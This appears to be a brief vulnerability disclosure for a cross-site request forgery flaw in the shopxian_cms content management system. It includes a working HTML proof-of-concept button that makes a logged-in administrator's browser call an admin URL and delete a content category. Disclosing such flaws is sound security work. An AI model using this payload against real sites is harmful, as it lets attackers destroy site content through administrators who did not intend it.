Cross-site request forgery exists in shopxian_cms
vendor:https://github.com/zhangqiquan/shopxian_cms
download link:https://github.com/zhangqiquan/shopxian_cms.git
Vulnerability details: When the administrator logs in, click the button will delete the specified column.
Vulnerability POC:
1
<input type ="button" onclick="javascript:location.href='http://127.0.0.1/index.php/contents-admin_cat-finderdel-model-ContentsCat.html?id=17'" value="Click Me!!!"></input>
CSRF HTML: 
open the html and click the button
Successfully deleted
Comments powered by Disqus.